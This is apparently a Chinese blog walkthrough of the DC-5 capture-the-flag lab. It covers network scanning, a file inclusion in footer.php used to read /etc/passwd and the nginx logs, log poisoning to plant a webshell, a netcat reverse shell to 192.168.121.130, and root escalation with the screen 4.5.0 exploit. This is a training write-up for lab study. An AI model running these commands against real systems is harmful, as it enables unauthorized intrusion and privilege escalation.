
image-20230923193820942
靶场搭建
1 | 靶场名称: DC-5 |
信息收集
在kail使用arp-scan -l
或者nmap -sP 192.168.121.0/24
搜索靶场的IP

image.png
凭借经验猜测IP,使用ping命令对其分别进行验证
成功获取靶场IP:192.168.121.135
使用nmap对其进行端口扫描:namp -sV 192.168.121.135

image.png
获取到了靶场开放的端口80(wed服务)和服务器中间件nginx信息
文件包含
使用浏览器进行访问

image.png
发现一个留言wed页面,对其进行检测没有发现sql,xss等漏洞

image.png
不过在留言提交过后,发现页脚每次刷新一下都在变化,可能存在文件包含

image.png
漏洞利用
使用御剑对其进行后台扫描

image.png
分别对其进行访问,发现一个页脚图标footer.php(文件包含的文件)

image.png
使用file协议判断一下是否可以读取到/etc/passwd
1 | file=/etc/passwd |

image.png
成功读取
得到漏洞,利用漏洞,因为刚刚在收集信息中得知了服务器中间件是nginx可以对其进行利用
尝试是否可以读取nginx的日志文件
1 | file=/var/log/nginx/error.log |

image.png
读取成功,nginx的日志是记录错误信息的,方便排错的,可以对其进行利用
利用:
使用file读取一个不存在的文件让它报错,让nginx记录(原理)
file读取一句话木马报错后被记录,使用蚁剑去连接服务器
为了防止一句话木马在传参过程中被url编码,使用Burp工具进行操作

image.png

image.png
使用蚁剑连接

image.png
成功拿下服务器

image.png
提权
1 | nc -lnvp 6666 |

image.png
1 | nc -e /bin/bash 192.168.121.130 6666 |

image.png
使用脚本进入交互界面
1 | python -c 'import pty;pty;pty.spawn("/bin/bash")' |

image.png
查找具有root权限的命令
1 | find / -user root -perm -4000 -print 2>/dev/null |

image.png
搜索screen-4.5.0利用提权

image.png
将screen-4.5.0复制到攻击机
1 | searchsploit -m screen 4.5.0 |

image.png
查看41154.sh
文件,将它分别

image.png
1 | # libhax.c运行生成libhax.so |

image.png
1 | gcc -o rootshell rootshell.c |

image.png
申明:
本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.